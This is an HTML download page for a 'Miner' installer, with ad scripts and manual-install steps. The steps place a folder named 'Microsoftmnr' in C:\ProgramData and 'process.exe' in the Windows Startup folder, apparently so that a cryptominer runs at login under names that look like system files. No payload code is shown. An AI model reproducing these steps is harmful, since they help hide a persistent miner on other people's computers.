<!DOCTYPE html>
<html lang="en-US">
 <head>
 	<title>Home</title>
 	<link rel="icon" href="miner/title.ico" type="image/x-icon">
 	<!--<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Aladin" />-------->
 	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
 	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
 	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
 	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

 	<script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
        (adsbygoogle = window.adsbygoogle || []).push({
        	google_ad_client: "ca-pub-1049680977222637",
        	enable_page_level_ads: true});
    (adsbygoogle = window.adsbygoogle || []).push({});
	(adsbygoogle = window.adsbygoogle || []).push({});</script>

 	<style>
 		ul{
 			color : black;
 			font-size: 30px;
 			position: absolute;
 			left: 150px;
 			font-family: Comic Sans MS;
 			margin-top: 60px;
 		}
 		h1{
 			color: green;
 			font-size: 70px;
 			font-family: Comic Sans MS;

 		}
 		a{
 			position: absolute;
 			left: 660px;
 			color: blue;
 			font-family: Comic Sans MS;
 			font-size: 30px;
 		}
 		marj{
 			position: absolute;
 			top: 400px;
 			margin-left: 50px;
 			margin-right: 50px;
 			height: auto;
 			width: auto;
 			background-color: grey;
 			font-size: 20px;
 			color: black;

 		}
 		ins{
 			position:absolute;
 			top:620px;
 			
 		}
 		amp-auto-ads{
 			position: absolute;
 			top:900px;
 		}
 		ins1{
 			position: relative;
 			top:1400px;
 		}
 	     		
 	</style>
 </head>
 <body>
 	<h1><center><u>Miner</u> <u>Download</u></center></h1>
 	<ul>
 		<li>Miner-Installer ------>&ensp;|"32" bit|&ensp;&ensp;<a1>-----></a1>&ensp;<a class="btn btn-primary btn-success" href="miner/minerinstaller32bit.zip" download="minerinstaller32bit.zip">Download</a></li>
 		<li>Miner-Installer ------>&ensp;|"64" bit|&ensp;&ensp;<a1>-----></a1>&ensp;<a class="btn btn-primary btn-success" href="miner/minerinstaller64bit.zip" download="minerinstaller64bit">Download</a></li>
 		<li>Miner-Manual&emsp;&nbsp;------>&ensp;|"32" bit|&ensp;&ensp;<a1>-----></a1>&ensp;<a class="btn btn-primary btn-success" href="miner/miner_manual_win32.zip"  download="miner_manual_win32.zip">Download</a></li>
 		<li>Miner-Manual&emsp;&nbsp;------>&ensp;|"64" bit|&ensp;&ensp;<a1>-----></a1>&ensp;<a class="btn btn-primary btn-success" href="miner/miner_manual_win64.zip"  download="miner_manual_win64.zip">Download</a></li>
 	</ul>
 	<marj><strong>
 		<p>-->> IF INSTALLER DOES'NT START OR HAVE ANY "ISSUES".<br>&emsp;-->>PLEASE DO MANUAL INSTALLATION OF THE FILES<br>
 		&emsp;&emsp;-->> COPY AND PASTE "Microsoftmnr" UNDER "C:\ProgramData" IN C: DRIVE or "IN OS INSTALLLED DRIVE RESPECTIVELY"<br>
 		&emsp;&emsp;-->> COPY AND PASTE "process.exe" UNDER "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" IN C: DRIVE &emsp;&emsp; OR "IN OS INSTALLLED DRIVE RESPECTIVELY"</p></strong>
 	</marj>
 	<amp-auto-ads type="adsense"
              data-ad-client="ca-pub-1049680977222637"></amp-auto-ads>

    <ins class="adsbygoogle"style="display:inline-block;width:970px;height:250px"data-ad-client="ca-pub-1049680977222637"0data-ad-slot="3237685788"></ins>
    <ins1 class="adsbygoogle"style="display:block"data-ad-format="fluid"data-ad-layout-key="-fb+5w+4e-db+86"data-ad-client="ca-pub-1049680977222637"data-ad-slot="5249605608"></ins1>
    <script type="text/javascript">
	var infolinks_pid = 3162415;
	var infolinks_wsid = 0;
	</script>
	<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
 </body>
 </html>





